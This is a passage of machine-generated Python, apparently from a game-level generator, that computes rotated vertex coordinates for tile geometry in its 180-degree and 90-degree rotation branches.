z34 = level*448 + 309
x35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z35 = level*448 + 64
x36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z36 = level*448 + 64
x37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z37 = level*448 + 309
x38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z38 = level*448 + 64
x39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z39 = level*448 + 64
x40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[0])
y40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[1])
z40 = level*448 + 64
x41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z41 = level*448 + 64
x42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z42 = level*448 + 320
x43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z43 = level*448 + 64
x44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z44 = level*448 + 64
x45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z45 = level*448 + 320
x46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z46 = level*448 + 320
x47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z47 = level*448 + 320
x48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[0])
y48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[1])
z48 = level*448 + 320
x49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z49 = level*448 + 64
x50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z50 = level*448 + 64
x51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z51 = level*448 + 64
x52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z52 = level*448 + 320
x53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z53 = level*448 + 64
x54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[0])
y54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[1])
z54 = level*448 + 64
x55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z55 = level*448 + 320
x56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z56 = level*448 + 64
x57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z57 = level*448 + 64
x58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z58 = level*448 + 309
x59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z59 = level*448 + 64
x60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z60 = level*448 + 64
x61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[0])
y61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[1])
z61 = level*448 + 64
x62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z62 = level*448 + 64
x63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z63 = level*448 + 309
x64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z64 = level*448 + 309
x65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z65 = level*448 + 64
x66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z66 = level*448 + 64
x67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[0])
y67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[1])
z67 = level*448 + 309
x68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z68 = level*448 + 309
x69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z69 = level*448 + 309
x70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z70 = level*448 + 64
x71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z71 = level*448 + 64
x72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z72 = level*448 + 64
x73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z73 = level*448 + 309
x74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z74 = level*448 + 64
x75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[0])
y75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[1])
z75 = level*448 + 64
x76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z76 = level*448 + 309
x77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z77 = level*448 + 64
x78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z78 = level*448 + 64
x79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z79 = level*448 + 64
x80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z80 = level*448 + 64
x81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z81 = level*448 + 309
x82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z82 = level*448 + 309
x83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z83 = level*448 + 309
x84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z84 = level*448 + 309
x85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z85 = level*448 + 64
x86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z86 = level*448 + 64
x87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z87 = level*448 + 64
x88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z88 = level*448 + 309
x89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z89 = level*448 + 64
x90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z90 = level*448 + 64
x91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z91 = level*448 + 64
x92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z92 = level*448 + 64
x93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z93 = level*448 + 309
x94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z94 = level*448 + 309
x95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z95 = level*448 + 64
x96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z96 = level*448 + 64
x97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z97 = level*448 + 309
x98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z98 = level*448 + 64
x99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z99 = level*448 + 64
x100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z100 = level*448 + 309
x101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z101 = level*448 + 64
x102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z102 = level*448 + 64
x103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z103 = level*448 + 309
x104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z104 = level*448 + 309
x105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z105 = level*448 + 309
x106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z106 = level*448 + 64
x107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z107 = level*448 + 64
x108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z108 = level*448 + 64
x109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z109 = level*448 + 309
x110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z110 = level*448 + 64
x111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z111 = level*448 + 64
x112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[0])
y112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[1])
z112 = level*448 + 64
x113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z113 = level*448 + 64
x114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z114 = level*448 + 309
x115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z115 = level*448 + 64
x116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z116 = level*448 + 64
x117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z117 = level*448 + 309
x118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z118 = level*448 + 309
x119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z119 = level*448 + 64
x120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z120 = level*448 + 64
x121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z121 = level*448 + 309
x122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z122 = level*448 + 309
x123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z123 = level*448 + 309
x124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z124 = level*448 + 64
x125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[0])
y125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[1])
z125 = level*448 + 64
x126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z126 = level*448 + 64
x127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z127 = level*448 + 309
x128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z128 = level*448 + 64
x129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z129 = level*448 + 64
x130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z130 = level*448 + 309
x131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z131 = level*448 + 64
x132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[0])
y132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[1])
z132 = level*448 + 64
#INSERT_ROT_2_PY_LIST
elif rotation == 3:
x1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z1 = level*448 + 64
x2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z2 = level*448 + 64
x3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z3 = level*448 + 64
x4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z4 = level*448 + 0
x5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z5 = level*448 + 0
x6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z6 = level*448 + 0
x7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z7 = level*448 + 64
x8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z8 = level*448 + 64
x9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z9 = level*448 + 0
x10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z10 = level*448 + 0
x11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z11 = level*448 + 0
x12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z12 = level*448 + 64
